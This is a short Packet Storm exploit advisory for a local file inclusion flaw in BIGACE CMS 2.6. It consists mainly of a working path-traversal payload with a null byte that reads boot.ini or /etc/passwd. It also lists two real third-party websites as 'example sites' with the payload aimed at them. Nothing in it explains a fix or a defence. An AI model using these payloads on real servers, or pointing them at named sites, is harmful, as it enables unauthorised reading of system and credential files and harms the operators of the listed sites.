BIGACE CMS 2.6 Local File Inclusion

2009-06-30T00:00:00
ID PACKETSTORM:78765
Type packetstorm
Reporter CWD@rBe
Modified 2009-06-30T00:00:00

Description

                                        
                                            `-----------------:LFI:----------------------------------------------------------------------------------------  
---------------------------------------------------------------------------------------------------------------  
script : BIGACE 2.6  
  
download : http://garr.dl.sourceforge.net/sourceforge/bigace/bigace_2.6.zip  
  
Author : CWD@rBe  
  
Special Thanks : www.cyber-warrior.org  
  
***************************************************************************************************************  
exploit:  
  
http://127.0.0.1/public/index.php?cmd=../../../../../../../../boot.ini%00&id=-1_tsearch_len  
  
example sites  
  
1.http://my.slow.ccu.edu.tw/bigace/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len  
  
2.http://www.tvoffenbach.net/public/index.php?cmd=../../../../../../../../etc/passwd%00&id=-1_tsearch_len  
  
****************************************************************************************************************  
  
  
`